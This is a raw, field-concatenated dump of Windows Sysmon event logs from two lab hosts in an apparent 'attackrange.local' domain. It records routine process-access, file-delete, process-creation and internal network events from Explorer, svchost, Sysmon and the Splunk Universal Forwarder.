08:05:25.964{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-5441-60E8-FB0F-00000000CF01}8412C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47c90|C:\Windows\System32\SHELL32.dll+6227c|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053685Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:25.964{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-5441-60E8-FB0F-00000000CF01}8412C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62250|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053684Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:25.964{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-5441-60E8-FB0F-00000000CF01}8412C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d2c9|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001053683Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:25.229{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shmMD5=1C538E1E8F255E67F92EA9564955691B,SHA256=4BA704E2FCE227292B8E5788A60C0E7E6E9B243C0AD861BA3B1A97E1502044C9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053682Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:25.065{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B81287C6446FBA8C3BD59F9B6D6F45C2,SHA256=9F9CE0F20CF63EDD9E9F0EDA67DBB0AE831CE897AB5BDA52F90A3716EB72424A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809959Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:26.710{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=00C73E09AA0B3151157219B6D98D18AB,SHA256=581658017F8879C66CE29C70DB21602A9E8F0A2C7722F9EB2F61F1CBA0C6AB44,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000809958Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:26.647{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=52337CA498DF87388EA43D548A210328,SHA256=254E607C1D460BB8A2E787C7859A3FACC888C37450C7492BE5A112AAD72B2845,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053690Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:26.080{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ED848E8361C01D4E9C95F58152EDCC66,SHA256=C30A3390578891FFB39AF8EBBEC4112372FDD2118180D22779B48CF88755BD7B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000809957Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:26.366{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F7C6-60EB-D179-00000000D001}1004C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809956Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:05:26.366{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809955Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:26.366{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809954Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:05:26.366{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809953Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:26.366{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809952Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:05:26.366{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809951Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:26.366{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809950Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:05:26.366{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809949Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:26.366{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809948Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:05:26.366{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809947Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:26.366{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F7C6-60EB-D179-00000000D001}1004C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000809946Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:26.350{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F7C6-60EB-D179-00000000D001}1004C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000809945Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:26.351{0C1E0330-F7C6-60EB-D179-00000000D001}1004C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000809944Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:24.343{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57433-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000809988Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:05:27.913{0C1E0330-F7C7-60EB-D379-00000000D001}2464388C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809987Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:27.741{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F7C7-60EB-D379-00000000D001}2464C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809986Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:05:27.741{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809985Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:27.741{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809984Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:05:27.741{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809983Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:27.741{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809982Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:05:27.741{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809981Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:27.741{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809980Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
